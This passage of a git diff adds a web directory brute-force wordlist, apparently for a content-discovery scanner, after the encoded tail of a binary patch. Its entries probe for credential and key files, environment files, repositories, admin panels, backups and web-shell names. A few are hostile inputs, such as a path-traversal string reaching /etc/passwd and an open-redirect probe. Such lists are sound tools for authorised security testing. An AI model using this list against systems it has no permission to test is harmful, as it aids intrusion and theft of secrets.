zkISF;Ud{F;^ht=0t3s6j=*3EtG!pK2KL&Pv9x2JUK$8zeIG3kPC`zNWp4AUVs@WwZ
z%)is{v^R#1g(vkmJCwLw!abLl=J2G}O$h=6Pi=zHPcF>-AkFF@ax`g3)lo|Dx3{6c
z;N{vtwcr%sqw9vL`bwk-F&XSY5@XS_sd*se!HeYUKM+y-ov)`6bQuuxHvu)*E`t({
zK`<-`EJ>E#C_r3+8+o@Woxb}kM~<S?`Nue(-n2nbQi;;Lm#sBU4|%=cwYW=-=Z)ii
zhqw2Kd$+CyAxTUD(>@Wh9TsF2A=hPiC<mC#!ffDFG7<GdD~eVilr?sy);R=ay@{GM
z|B2GamB{~0(uvrKY$!t==ifDTFBeJ#`a$FZIj6#VndCbN)6@lkYQ~VGb@En!GkJ5{
zylIgGs0TW!dkPLkDnE(<#i{N5@h10)ysa0G#XROkTZw<r;5hnYRSrCi9C3WfGQcmN
zG-Z?oj3Y*jb^D^4N73gV#oQmx3&_)t0vcb2KBqxR%~E1TdfvfvPilTi+BhI-17?jk
z1|Vgf0Jn}iCPYLm1ROwAi4`W2WVpGGwdq+^sw2qMSg!Y_W_L4DTPtN!4Ieowc3W|i
zG^}p`*PW383sDNFd!NFi-yD&X<d6E8a!9|q(~vg-!2v%0^b90ZjT0=fn$p9Q9cy!f
z2=Q~R`1eX2Ex58*g{Ncs>O)$fJQ=WGtM`lxMc1}wEyz0VkF6Rg*!hNh1eq_S;1CdQ
z+svqvxX+?xn_=i9CIww$iAvE>Ud!-GM9j34a`z-?SkEf72ua6ibv~l0S_3HAFz(f~
zR?eka4QqlI^Ju#gb%~)x3ZnK`Mw%aL=Ty~)x;>WvMk#2&pn4PlZNH#)cC$!iz}QAJ
z5@TeNjD;uUYb3m}W62*M%J4(=9M%KT?`q4<4m@u3KH9~^+1C_RD9kTXlL+nv5c3g0
zAUMryyj2uO!qV@s_WC_FHM)B0q{8?zQ8j}lHBI5OyhmZtHM4rl6R9M_h9UY6Y~k99
zadp)|G8O`ANqOF}<xX;T823N6Dv=3HrGy-M%Aa{gcPgk8V+2=FcsvybQDe-Po-Rsu
zc*1G)5KjL<Q=f=Ed^y$!hvj=GbkVcmXPbY2l<hoVEK;@>O&>{yJ#boO3EQqrWVq<b
zsIL6=#h>f{Hii_}5caS_fdLd&D3!FR%bRW^plCK16i%;n6_Wf!8;ClIaVaKN*9J9W
U>n~q1aH$A(ttT0GFf$QW_ne|ePyhe`

literal 0
HcmV?d00001

diff --git a/db/directory-bruteforces.txt b/db/directory-bruteforces.txt
new file mode 100644
index 00000000..c854e363
--- /dev/null
+++ b/db/directory-bruteforces.txt
@@ -0,0 +1,5331 @@
+!.gitignore
+!.htaccess
+!.htpasswd
+%20../
+%2e%2e//google.com
+%2e%2e;test/
+%3f/
+%C0%AE%C0%AE%C0%AF
+%ff/
+..;/
+.7z
+.access
+.addressbook
+.adm
+.admin
+.apache.env
+.apdisk
+.AppleDB
+.AppleDesktop
+.AppleDouble
+.apt_generated/
+.architect
+.aws/credentials
+.axoCover/
+.babelrc
+.backup
+.bak
+.bash_history
+.bash_logout
+.bash_profile
+.bashrc
+.bower-cache
+.bower-registry
+.bower-tmp
+.bower.json
+.build/
+.buildpacks
+.buildpath
+.buildpath/
+.builds
+.bundle
+.bundle/
+.byebug_history
+.bz2
+.bzr/
+.bzr/README
+.c9/
+.c9revisions/
+.cabal-sandbox/
+.cache
+.cache/
+.canna
+.capistrano
+.capistrano/
+.capistrano/metrics
+.capistrano/metrics/
+.cask
+.cc-ban.txt
+.cc-ban.txt.bak
+.cfg
+.cfignore
+.checkstyle
+.circleci/
+.circleci/.firebase.secrets.json
+.circleci/.firebase.secrets.json.enc
+.circleci/config.yml
+.classpath
+.cobalt
+.codeclimate.yml
+.codeintel
+.codekit-cache
+.codio
+.coffee_history
+.compile
+.composer
+.concrete/DEV_MODE
+.conf
+.config
+.config.php.swp
+.config/
+.config/filezilla/sitemanager.xml.xml
+.config/psi+/profiles/default/accounts.xml
+.configuration.php.swp
+.consulo/
+.contracts
+.coq-native/
+.core
+.coverage
+.cpan
+.cpanel/
+.cpcache/
+.cproject
+.cr/
+.csdp.cache
+.cshrc
+.CSV
+.csv
+.CVS
+.cvs
+.cvsignore
+.dart_tool/
+.dat
+.database.env
+.db.env
+.db.xml
+.db.yaml
+.debug.env
+.deployignore
+.dev/
+.devcontainer
+.directory
+.django.env
+.dockerignore
+.drone.yml
+.DS_Store
+.dub
+.dump
+.eclipse
+.editorconfig
+.eggs/
+.elastic.env
+.elasticbeanstalk/
+.elb
+.elc
+.emacs
+.emacs.desktop
+.emacs.desktop.lock
+.empty-folder
+.env
+.env.backup
+.env.bak
+.env.copy
+.env.dev
+.env.dev.local
+.env.development
+.env.development.local
+.env.development.sample
+.env.docker
+.env.docker.dev
+.env.local
+.env.new
+.env.php
+.env.prod
+.env.prod.local
+.env.production
+.env.production.local
+.env.remote
+.env.sample.php
+.env.staging
+.env.test.sample
+.environment
+.error_log
+.eslintcache
+.eslintignore
+.eslintrc
+.espressostorage
+.eunit
+.external/
+.external/data
+.externalNativeBuild
+.externalToolBuilders/
+.fake/
+.FBCIndex
+.fetch
+.fhp
+.filemgr-tmp
+.filezilla/
+.filezilla/sitemanager.xml.xml
+.fishsrv.pl
+.flac
+.flowconfig
+.fontconfig/
+.fontcustom-manifest.json
+.forward
+.ftp
+.ftp-access
+.ftppass
+.ftpquota
+.gem
+.gfclient/
+.gfclient/pass
+.git
+.git-credentials
+.git-rewrite/
+.git/
+.git/config
+.git/HEAD
+.git/index
+.git/logs/
+.git/logs/HEAD
+.git/logs/refs
+.git2/
+.git_release
+.gitattributes
+.gitconfig
+.gitignore
+.gitignore.swp
+.gitignore_global
+.gitignore~
+.gitk
+.gitkeep
+.gitlab
+.gitlab-ci.yml
+.gitlab/issue_templates
+.gitlab/merge_request_templates
+.gitlab/route-map.yml
+.gitmodules
+.gitreview
+.gradle
+.gradle/
+.gradletasknamecache
+.grunt
+.grunt/
+.gtkrc
+.guile_history
+.gwt-tmp/
+.gwt/
+.gz
+.hash
+.hg
+.hg/
+.hg/dirstate
+.hg/requires
+.hg/store/data/
+.hg/store/undo
+.hg/undo.dirstate
+.hgignore
+.hgignore.global
+.hgrc
+.histfile
+.history
+.hpc
+.hsenv
+.ht_wsr.txt
+.hta
+.htaccess
+.htaccess-dev
+.htaccess-local
+.htaccess-marco
+.htaccess.BAK
+.htaccess.bak
+.htaccess.bak1
+.htaccess.old
+.htaccess.orig
+.htaccess.sample
+.htaccess.save
+.htaccess.txt
+.htaccess_extra
+.htaccess_orig
+.htaccess_sc
+.htaccessBAK
+.htaccessOLD
+.htaccessOLD2
+.htaccess~
+.HTF/
+.htgroup
+.htpasswd
+.htpasswd-old
+.htpasswd_test
+.htpasswds
+.httr-oauth
+.htusers
+.hypothesis/
+.idea
+.idea/
+.idea/.name
+.idea/caches
+.idea/compiler.xml
+.idea/copyright/profiles_settings.xml
+.idea/dataSources.ids
+.idea/dataSources.local.xml
+.idea/dataSources.xml
+.idea/deployment.xml
+.idea/dictionaries
+.idea/drush_stats.iml
+.idea/encodings.xml
+.idea/gradle.xml
+.idea/libraries
+.idea/misc.xml
+.idea/modules.xml
+.idea/scopes/scope_settings.xml
+.idea/Sites.iml
+.idea/sqlDataSources.xml
+.idea/tasks.xml
+.idea/uiDesigner.xml
+.idea/vcs.xml
+.idea/WebServers.xml
+.idea/woaWordpress.iml
+.idea/workspace(2).xml
+.idea/workspace(3).xml
+.idea/workspace(4).xml
+.idea/workspace(5).xml
+.idea/workspace(6).xml
+.idea/workspace(7).xml
+.idea/workspace.xml
+.idea0/
+.idea_modules/
+.ignore
+.ignored/
+.import/
+.influx_history
+.ini
+.inst/
+.install/
+.install/composer.phar
+.installed.cfg
+.ipynb_checkpoints
+.jekyll-cache/
+.jekyll-metadata
+.jestrc
+.joe_state
+.jpilot
+.jscsrc
+.jshintignore
+.jshintrc
+.jsp
+.JustCode
+.kde
+.keep
+.keys.yml
+.kitchen.local.yml
+.kitchen.yml
+.kitchen/
+.komodotools
+.komodotools/
+.ksh_history
+.laravel.env
+.last_cover_stats
+.lein-deps-sum
+.lein-failures
+.lein-plugins/
+.lein-repl-history
+.lesshst
+.lia.cache
+.libs/
+.lighttpd.conf
+.listing
+.listings
+.loadpath
+.LOCAL
+.local
+.localcache/
+.localeapp/
+.localsettings.php.swp
+.lock-wscript
+.log
+.log.txt
+.login
+.login_conf
+.LSOverride
+.lynx_cookies
+.m2/settings.xml
+.magentointel-cache/
+.mail_aliases
+.mailrc
+.maintenance
+.maintenance2
+.mc
+.mc/
+.members
+.memdump
+.mergesources.yml
+.merlin
+.meta
+.metadata
+.metadata/
+.metrics
+.modgit/
+.modman
+.modman/
+.modules
+.mono/
+.mr.developer.cfg
+.msi
+.mtj.tmp/
+.mvn/timing.properties
+.mweval_history
+.mwsql_history
+.mypy_cache/
+.mysql.env
+.mysql_history
+.nano_history
+.navigation/
+.nbproject/
+.netrc
+.netrwhist
+.next
+.nginx.env
+.nia.cache
+.nlia.cache
+.node_repl_history
+.nodelete
+.npm
+.npmignore
+.npmrc
+.nra.cache
+.nrepl-port
+.nsconfig
+.nsf
+.ntvs_analysis.dat
+.nuget/
+.nuget/packages.config
+.nyc_output
+.old
+.old.env
+.oldsnippets
+.oldstatic
+.org-id-locations
+.ost
+.packages
+.paket/
+.pass
+.passes
+.passwd
+.password
+.passwords
+.passwrd
+.patches/
+.pdf
+.perf
+.pgadmin3
+.pgpass
+.pgsql_history
+.php-ini
+.php-version
+.php_history
+.phpintel
+.phpstorm.meta.php
+.phptidy-cache
+.phpversion
+.pki
+.placeholder
+.postgres.env
+.powenv
+.pre-commit-config.yaml
+.procmailrc
+.production
+.profile
+.project
+.project.xml
+.project/
+.projectOptions
+.properties
+.psci
+.psci_modules
+.psql_history
+.psqlrc
+.pst
+.pub/
+.pwd
+.pydevproject
+.pylintrc
+.pytest_cache/
+.Python
+.python-eggs
+.python-history
+.python-version
+.qmake.cache
+.qmake.stash
+.qqestore/
+.Rapp.history
+.rar
+.raw
+.rbtp
+.RData
+.rdsTempFiles
+.rebar
+.rediscli_history
+.reek
+.remote
+.remote-sync.json
+.repl_history
+.revision
+.Rhistory
+.rhost
+.rhosts
+.robots.txt
+.rocketeer/
+.ropeproject
+.Rproj.user/
+.rspec
+.rsync-filter
+.rsync_cache
+.rsync_cache/
+.rubocop.yml
+.rubocop_todo.yml
+.ruby-gemset
+.ruby-version
+.rvmrc
+.s3backupstatus
+.sass-cache/
+.scala_history
+.sconsign.dblite
+.scrapy
+.scrutinizer.yml
+.selected_editor
+.settings
+.settings.php.swp
+.settings/
+.settings/.jsdtscope
+.settings/org.eclipse.core.resources.prefs
+.settings/org.eclipse.php.core.prefs
+.settings/org.eclipse.wst.common.project.facet.core.xml
+.settings/org.eclipse.wst.jsdt.ui.superType.container
+.settings/org.eclipse.wst.jsdt.ui.superType.name
+.sh
+.sh_history
+.shrc
+.sln
+.smileys
+.smushit-status
+.spamassassin
+.spyderproject
+.spyproject
+.sql
+.sql.bz2
+.sql.gz
+.sqlite_history
+.src/app.js
+.src/index.js
+.src/server.js
+.ssh
+.ssh.asp
+.ssh.php
+.ssh/
+.ssh/authorized_keys
+.ssh/id_dsa
+.ssh/id_rsa
+.ssh/id_rsa.key
+.ssh/id_rsa.key~
+.ssh/id_rsa.priv
+.ssh/id_rsa.priv~
+.ssh/id_rsa.pub
+.ssh/id_rsa.pub~
+.ssh/id_rsa~
+.ssh/know_hosts
+.ssh/know_hosts~
+.ssh/known_host
+.ssh/known_hosts
+.st_cache/
+.stack-work/
+.style.yapf
+.stylelintrc
+.sublime-gulp.cache
+.sublime-project
+.sublime-workspace
+.subversion
+.sucuriquarantine/
+.sunw
+.svn
+.svn/
+.svn/all-wcprops
+.svn/entries
+.svn/text-base/
+.svn/text-base/index.php.svn-base
+.svnignore
+.sw
+.swf
+.swo
+.swp
+.SyncID
+.SyncIgnore
+.synthquota
+.system/
+.tags
+.tar
+.tar.bz2
+.tar.gz
+.tconn/
+.tconn/tconn.conf
+.temp
+.temp/
+.texpadtmp
+.tfignore
+.tgitconfig
+.thumbs
+.tmp
+.tmp_versions/
+.tmproj
+.tox
+.tox/
+.transients_purge.log
+.Trash
+.Trashes
+.travis.yml
+.tx/
+.txt
+.user.ini
+.users
+.vacation.cache
+.vagrant
+.venv
+.version
+.vgextensions/
+.viminfo
+.vimrc
+.vs/
+.vscode
+.vscode/sftp.json
+.web
+.web-server-pid
+.web.env
+.webassets-cache
+.workspace/
+.wp-config.php.swp
+.www_acl
+.wwwacl
+.yardoc/
+.yarn-integrity
+.yo-rc.json
+.zeus.sock
+.zfs/
+.zip
+.zsh_history
+.zshrc
+/api-doc
+/api-docs
+/api.html
+/api.json
+/api.yaml
+/api.yml
+/api/2/explore/
+/api/docs
+/api/package_search/v4/documentation
+/api/swagger
+/api/swagger-resources
+/api/swagger-ui
+/api/swagger-ui.html
+/api/swagger.json
+/api/swagger.yaml
+/api/swagger.yml
+/api/swagger/v2/api-docs
+/api/swagger/v3/api-docs
+/api/v1/api-docs
+/api/v1/documentation
+/api/v2/api-docs
+/api/v2/documentation
+/api/v2/swagger.json
+/api/v3/api-docs
+/api/v3/documentation
+/api/v3/swagger.json
+/apidoc
+/apidocs
+/application
+/backoffice/v1/ui
+/build/reference/web-api/explore
+/classicapi/doc/
+/core/latest/swagger-ui/index.html
+/csp/gateway/slc/api/swagger-ui.html
+/doc
+/docs
+/documentation/swagger-ui
+/documentation/swagger-ui.html
+/documentation/swagger.json
+/documentation/swagger.yaml
+/documentation/swagger.yml
+/internal/docs
+/openapi.json
+/rest/v1
+/rest/v3/doc
+/swagger
+/swagger-resources
+/swagger-resources/configuration/security
+/swagger-resources/configuration/ui
+/swagger-ui.html
+/swagger-ui.html/v2/api-docs
+/swagger-ui.html/v3/api-docs
+/swagger-ui/
+/swagger-ui/index.html
+/swagger.json
+/swagger.yaml
+/swagger.yml
+/swagger/index.html
+/swagger/swagger-ui.html
+/swagger/v2/api-docs
+/swagger/v3/api-docs
+/swaggerui
+/ui
+/ui/
+/v1
+/v1.0
+/v1.1
+/v1.x/swagger-ui.html
+/v2
+/v2.0
+/v2/api-docs
+/v3
+/v3/api-docs
+0.htpasswd
+0.php
+0admin/
+0manager/
+1.7z
+1.htaccess
+1.htpasswd
+1.php
+1.rar
+1.sql
+1.tar
+1.tar.bz2
+1.tar.gz
+1.txt
+1.zip
+10-flannel.conf
+111.php
+123.php
+123.txt
+1c/
+1c_exchange.php
+2.php
+2.sql
+2.txt
+2010.sql
+2010.tar
+2010.tar.bz2
+2010.tar.gz
+2010.tgz
+2010.zip
+2011.sql
+2011.tar
+2011.tar.bz2
+2011.tar.gz
+2011.tgz
+2011.zip
+2012.sql
+2012.tar
+2012.tar.bz2
+2012.tar.gz
+2012.tgz
+2012.zip
+2013.sql
+2013.tar
+2013.tar.bz2
+2013.tar.gz
+2013.tgz
+2013.zip
+2014.sql
+2014.tar
+2014.tar.bz2
+2014.tar.gz
+2014.tgz
+2014.zip
+2015.sql
+2015.tar
+2015.tar.bz2
+2015.tar.gz
+2015.tgz
+2015.zip
+2016.sql
+2016.tar
+2016.tar.bz2
+2016.tar.gz
+2016.tgz
+2016.zip
+2017.sql
+2017.tar
+2017.tar.bz2
+2017.tar.gz
+2017.tgz
+2017.zip
+2018.sql
+2018.tar
+2018.tar.bz2
+2018.tar.gz
+2018.tgz
+2018.zip
+2019.sql
+2019.tar
+2019.tar.bz2
+2019.tar.gz
+2019.tgz
+2019.zip
+2020.sql
+2020.tar
+2020.tar.bz2
+2020.tar.gz
+2020.tgz
+2020.zip
+2021.sql
+2021.tar
+2021.tar.bz2
+2021.tar.gz
+2021.tgz
+2021.zip
+2022-backup.zip
+2022.sql
+2022.tar
+2022.tar.bz2
+2022.tar.gz
+2022.tgz
+2022.zip
+2023-backup.zip
+2023.sql
+2023.tar
+2023.tar.bz2
+2023.tar.gz
+2023.tgz
+2023.zip
+2024-backup.zip
+2024.sql
+2024.tar
+2024.tar.bz2
+2024.tar.gz
+2024.tgz
+2024.zip
+2phpmyadmin/
+3.php
+4.php
+5.php
+6.php
+7.php
+7788.php
+8.php
+8899.php
+9.php
+9678.php
+\..\..\..\..\..\..\..\..\..\etc\passwd
+_.htpasswd
+__admin
+__bx_log.log
+__cache/
+__dummy.html
+__history/
+__index.php
+__init__.py
+__MACOSX
+__main__.py
+__php_errors.log
+__pma___
+__pycache__/
+__recovery/
+__SQL
+__test.php
+__web_console/
+_adm
+_admin
+_book
+_build
+_build/
+_cache/
+_common.xsl
+_config.inc
+_data/
+_data/error_log
+_debugbar/open
+_Dockerfile
+_errors
+_eumm/
+_files
+_fragment
+_h5ai/
+_include
+_index.php
+_install
+_internal
+_layouts
+_layouts/
+_layouts/alllibs.htm
+_layouts/settings.htm
+_layouts/userinfo.htm
+_log/
+_log/access-log
+_log/access.log
+_log/access_log
+_log/error-log
+_log/error.log
+_log/error_log
+_logs
+_logs/
+_logs/access-log
+_logs/access.log
+_logs/access_log
+_logs/err.log
+_logs/error-log
+_logs/error.log
+_logs/error_log
+_LPHPMYADMIN/
+_mmServerScripts/
+_mmServerScripts/MMHTTPDB.asp
+_mmServerScripts/MMHTTPDB.php
+_notes/
+_notes/dwsync.xml
+_novo/
+_novo/composer.lock
+_old
+_pages
+_php_errors.log
+_phpmyadmin/
+_pkginfo.txt
+_private
+_proxy
+_Pvt_Extensions
+_site/
+_source
+_SQL
+_sqladm
+_src
+_TeamCity
+_test
+_thumbs/
+_tracks
+_UpgradeReport_Files/
+_vti_bin/
+_vti_bin/_vti_adm/admin.dll
+_vti_bin/_vti_aut/author.dll
+_vti_bin/shtml.dll
+_vti_pvt/
+_vti_pvt/service.pwt
+_vti_pvt/users.pwt
+_WEB_INF/
+_wl_cls_gen.jar
+_wpeprivate
+_wpeprivate/
+_wpeprivate/config.json
+_www
+_yardoc/
+a%5c.aspx
+a.out
+aadmin/
+abs/
+acceptance_config.yml
+acceso
+acceso.php
+access
+access-log
+access-log.1
+access.1
+access.log
+access.php
+access.txt
+access/
+access_.log
+access_log
+access_log.1
+accesslog
+account.html
+account.php
+accounts
+accounts.php
+accounts.sql
+accounts.txt
+accounts.xml
+accounts/
+acct_login/
+activemq/
+activity.log
+actuator
+actuator/dump
+actuator/env
+actuator/logfile
+actuator/mappings
+actuator/trace
+ad_login
+ad_manage
+add.php
+add_admin
+adfs/services/trust/2005/windowstransport
+adm
+adm.html
+adm.php
+adm/
+adm/admloginuser.php
+adm/index.html
+adm/index.php
+adm_auth
+adm_auth.php
+admin
+admin%20/
+admin-authz.xml
+admin-console
+admin-console/
+admin-database
+admin-database.php
+admin-database/
+admin-dev/
+admin-dev/autoupgrade/
+admin-dev/backups/
+admin-dev/export/
+admin-dev/import/
+admin-login
+admin-login.html
+admin-login.php
+admin-serv/
+admin-serv/config/admpw
+admin.asp
+admin.aspx
+admin.cfm
+admin.cgi
+admin.conf
+admin.conf.default
+admin.dat
+admin.do
+admin.htm
+admin.htm.php
+admin.html
+admin.html.php
+admin.jsp
+admin.mdb
+admin.passwd
+admin.php
+admin.php3
+admin.pl
+admin/
+admin/.config
+admin/.htaccess
+admin/_logs/access-log
+admin/_logs/access.log
+admin/_logs/access_log
+admin/_logs/err.log
+admin/_logs/error-log
+admin/_logs/error.log
+admin/_logs/error_log
+admin/_logs/login.txt
+admin/access.log
+admin/access.txt
+admin/access_log
+admin/account
+admin/account.html
+admin/account.php
+admin/admin
+admin/admin-login
+admin/admin-login.html
+admin/admin-login.php
+admin/admin.html
+admin/admin.php
+admin/admin_login
+admin/admin_login.html
+admin/admin_login.php
+admin/adminLogin
+admin/adminLogin.htm
+admin/adminLogin.html
+admin/adminLogin.php
+admin/backup/
+admin/backups/
+admin/config.php
+admin/controlpanel
+admin/controlpanel.htm
+admin/controlpanel.html
+admin/controlpanel.php
+admin/cp
+admin/cp.html
+admin/cp.php
+admin/db/
+admin/default
+admin/default.asp
+admin/default/admin.asp
+admin/default/login.asp
+admin/download.php
+admin/dumper/
+admin/error.log
+admin/error.txt
+admin/error_log
+admin/export.php
+admin/FCKeditor
+admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
+admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
+admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+admin/fckeditor/editor/filemanager/connectors/php/connector.php
+admin/fckeditor/editor/filemanager/connectors/php/upload.php
+admin/fckeditor/editor/filemanager/upload/asp/upload.asp
+admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
+admin/fckeditor/editor/filemanager/upload/php/upload.php
+admin/file.php
+admin/files.php
+admin/home
+admin/home.html
+admin/home.php
+admin/includes/configure.php~
+admin/index
+admin/index.asp
+admin/index.html
+admin/index.php
+admin/js/tiny_mce/
+admin/js/tinymce/
+admin/log
+admin/login
+admin/login.asp
+admin/login.htm
+admin/login.html
+admin/login.php
+admin/logon.jsp
+admin/logs/
+admin/logs/access-log
+admin/logs/access.log
+admin/logs/access_log
+admin/logs/err.log
+admin/logs/error-log
+admin/logs/error.log
+admin/logs/error_log
+admin/logs/login.txt
+admin/manage
+admin/manage.asp
+admin/manage/admin.asp
+admin/manage/login.asp
+admin/mysql/
+admin/mysql/index.php
+admin/mysql2/index.php
+admin/phpMyAdmin
+admin/phpMyAdmin/
+admin/phpmyadmin/
+admin/phpMyAdmin/index.php
+admin/phpmyadmin/index.php
+admin/phpmyadmin2/index.php
+admin/pMA/
+admin/pma/
+admin/PMA/index.php
+admin/pma/index.php
+admin/pol_log.txt
+admin/private/logs
+admin/secure/logon.jsp
+admin/sqladmin/
+admin/sxd/
+admin/sysadmin/
+admin/upload.php
+admin/uploads.php
+admin/user_count.txt
+admin/web/
+admin0
+admin1
+admin1.htm
+admin1.html
+admin1.php
+admin1/
+admin2
+admin2.asp
+admin2.html
+admin2.old/
+admin2.php
+admin2/
+admin2/index.php
+admin2/login.php
+admin3/
+admin4/
+admin4_account/
+admin4_colon/
+admin5/
+admin_
+admin_/
+admin_admin
+admin_area
+admin_area.php
+admin_area/
+admin_area/admin
+admin_area/admin.html
+admin_area/admin.php
+admin_area/index.html
+admin_area/index.php
+admin_area/login
+admin_area/login.html
+admin_area/login.php
+admin_files
+admin_index
+admin_index.asp
+admin_login
+admin_login.html
+admin_login.php
+admin_login/
+admin_login/admin.asp
+admin_login/login.asp
+admin_logon
+admin_logon/
+admin_main
+admin_pass
+admin_tools/
+adminarea/
+adminarea/admin.html
+adminarea/admin.php
+adminarea/index.html
+adminarea/index.php
+adminarea/login.html
+adminarea/login.php
+adminconsole
+admincontrol
+admincontrol.html
+admincontrol.php
+admincontrol/
+admincontrol/login.html
+admincontrol/login.php
+admincp/
+admincp/index.asp
+admincp/index.html
+admincp/js/kindeditor/
+admincp/login
+admincp/login.asp
+admincp/upload/
+adminedit
+adminer-4.0.0-en.php
+adminer-4.0.0-mysql-en.php
+adminer-4.0.0-mysql.php
+adminer-4.0.0.php
+adminer-4.0.1-en.php
+adminer-4.0.1-mysql-en.php
+adminer-4.0.1-mysql.php
+adminer-4.0.1.php
+adminer-4.0.2-en.php
+adminer-4.0.2-mysql-en.php
+adminer-4.0.2-mysql.php
+adminer-4.0.2.php
+adminer-4.0.3-en.php
+adminer-4.0.3-mysql-en.php
+adminer-4.0.3-mysql.php
+adminer-4.0.3.php
+adminer-4.1.0-en.php
+adminer-4.1.0-mysql-en.php
+adminer-4.1.0-mysql.php
+adminer-4.1.0.php
+adminer-4.2.0-en.php
+adminer-4.2.0-mysql-en.php
+adminer-4.2.0-mysql.php
+adminer-4.2.0.php
+adminer-4.2.1-en.php
+adminer-4.2.1-mysql-en.php
+adminer-4.2.1-mysql.php
+adminer-4.2.1.php
+adminer-4.2.2-en.php
+adminer-4.2.2-mysql-en.php
+adminer-4.2.2-mysql.php
+adminer-4.2.2.php
+adminer-4.2.3-en.php
+adminer-4.2.3-mysql-en.php
+adminer-4.2.3-mysql.php
+adminer-4.2.3.php
+adminer-4.2.4-en.php
+adminer-4.2.4-mysql-en.php
+adminer-4.2.4-mysql.php
+adminer-4.2.4.php
+adminer-4.2.5-en.php
+adminer-4.2.5-mysql-en.php
+adminer-4.2.5-mysql.php
+adminer-4.2.5.php
+adminer-4.3.0-en.php
+adminer-4.3.0-mysql-en.php
+adminer-4.3.0-mysql.php
+adminer-4.3.0.php
+adminer-4.3.1-en.php
+adminer-4.3.1-mysql-en.php
+adminer-4.3.1-mysql.php
+adminer-4.3.1.php
+adminer-4.4.0-en.php
+adminer-4.4.0-mysql-en.php
+adminer-4.4.0-mysql.php
+adminer-4.4.0.php
+adminer-4.5.0-en.php
+adminer-4.5.0-mysql-en.php
+adminer-4.5.0-mysql.php
+adminer-4.5.0.php
+adminer-4.6.0-en.php
+adminer-4.6.0-mysql-en.php
+adminer-4.6.0-mysql.php
+adminer-4.6.0.php
+adminer-4.6.1-en.php
+adminer-4.6.1-mysql-en.php
+adminer-4.6.1-mysql.php
+adminer-4.6.1.php
+adminer-4.6.2-en.php
+adminer-4.6.2-mysql-en.php
+adminer-4.6.2-mysql.php
+adminer-4.6.2.php
+adminer-4.6.3-en.php
+adminer-4.6.3-mysql-en.php
+adminer-4.6.3-mysql.php
+adminer-4.6.3.php
+adminer-4.7.0-en.php
+adminer-4.7.0-mysql-en.php
+adminer-4.7.0-mysql.php
+adminer-4.7.0.php
+adminer-4.7.1-en.php
+adminer-4.7.1-mysql-en.php
+adminer-4.7.1-mysql.php
+adminer-4.7.1.php
+adminer-4.7.2-en.php
+adminer-4.7.2-mysql-en.php
+adminer-4.7.2-mysql.php
+adminer-4.7.2.php
+adminer-4.7.3-en.php
+adminer-4.7.3-mysql-en.php
+adminer-4.7.3-mysql.php
+adminer-4.7.3.php
+adminer-4.7.4-en.php
+adminer-4.7.4-mysql-en.php
+adminer-4.7.4-mysql.php
+adminer-4.7.4.php
+adminer-4.7.5-en.php
+adminer-4.7.5-mysql-en.php
+adminer-4.7.5-mysql.php
+adminer-4.7.5.php
+adminer-4.7.6-en.php
+adminer-4.7.6-mysql-en.php
+adminer-4.7.6-mysql.php
+adminer-4.7.6.php
+adminer-4.7.7-en.php
+adminer-4.7.7-mysql-en.php
+adminer-4.7.7-mysql.php
+adminer-4.7.7.php
+adminer-4.7.8-en.php
+adminer-4.7.8-mysql-en.php
+adminer-4.7.8-mysql.php
+adminer-4.7.8.php
+adminer-4.7.9-en.php
+adminer-4.7.9-mysql-en.php
+adminer-4.7.9-mysql.php
+adminer-4.7.9.php
+adminer-4.8.0-en.php
+adminer-4.8.0-mysql-en.php
+adminer-4.8.0-mysql.php
+adminer-4.8.0.php
+adminer-4.8.1-en.php
+adminer-4.8.1-mysql-en.php
+adminer-4.8.1-mysql.php
+adminer-4.8.1.php
+adminer.php
+adminer/
+adminer/adminer.php
+adminer_coverage.ser
+adminis.php
+administer/
+administr8
+administr8.php
+administr8/
+administracao.php
+administracion.php
+administracion/
+administrador/
+administrateur.php
+administrateur/
+administratie/
+administration
+administration.php
+administration/
+administration/Sym.php
+administrative/
+administrative/login_history
+administrator
+administrator-login/
+administrator.html
+administrator.php
+administrator/
+administrator/.htaccess
+administrator/account
+administrator/account.html
+administrator/account.php
+administrator/admin.asp
+administrator/admin/
+administrator/cache/
+administrator/db/
+administrator/includes/
+administrator/index.html
+administrator/index.php
+administrator/login
+administrator/login.asp
+administrator/login.html
+administrator/login.php
+administrator/logs
+administrator/logs/
+administrator/phpMyAdmin/
+administrator/phpmyadmin/
+administrator/PMA/
+administrator/pma/
+administrator/web/
+administratoraccounts/
+administratorlogin
+administratorlogin.php
+administratorlogin/
+administrators
+administrators.php
+administrators.pwd
+administrators/
+administrivia/
+adminitem
+adminitem/
+adminitems
+adminitems.php
+adminitems/
+adminlogin
+adminLogin.html
+adminLogin.php
+adminlogin.php
+adminLogin/
+adminlogon/
+adminpanel
+adminpanel.html
+adminpanel.php
+adminpanel/
+adminpro/
+admins
+admins.asp
+admins.php
+admins/
+admins/backup/
+admins/log.txt
+adminsite/
+AdminTools/
+adminuser
+admission_controller_config.yaml
+admloginuser.php
+admpar/
+admpar/.ftppass
+admrev/
+admrev/.ftppass
+admrev/_files/
+affiliate
+affiliate.php
+affiliates.sql
+ak47.php
+akeeba.backend.log
+all/
+all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+amad.php
+amministratore.php
+analog.html
+anchor/errors.log
+ansible/
+answers/
+answers/error_log
+apache/
+apache/logs/access.log
+apache/logs/access_log
+apache/logs/error.log
+apache/logs/error_log
+apc-nrp.php
+apc.php
+apc/
+apc/apc.php
+apc/index.php
+api
+api-doc
+api-docs
+api.log
+api.php
+api.tar.gz
+api.tgz
+api.py
+api.zip
+api/
+api/2/explore/
+api/error_log
+api/graphiql
+api/graphql
+api/jsonws
+api/login.json
+api/package_search/v4/documentation
+api/swagger
+api/swagger-ui.html
+api/swagger.yml
+api/v1
+api/v1/graphiql
+api/v1/graphql
+api/v1/playground
+api/v2
+api/v2/graphiql
+api/v2/graphql
+api/v2/playground
+api/v3
+api/v3/graphiql
+api/v3/graphql
+api/v3/playground
+api_log.txt
+apibuild.pyc
+apidoc
+apidocs
+apiserver-aggregator-ca.cert
+apiserver-aggregator.cert
+apiserver-aggregator.key
+apiserver-client.crt
+apiserver-key.pem
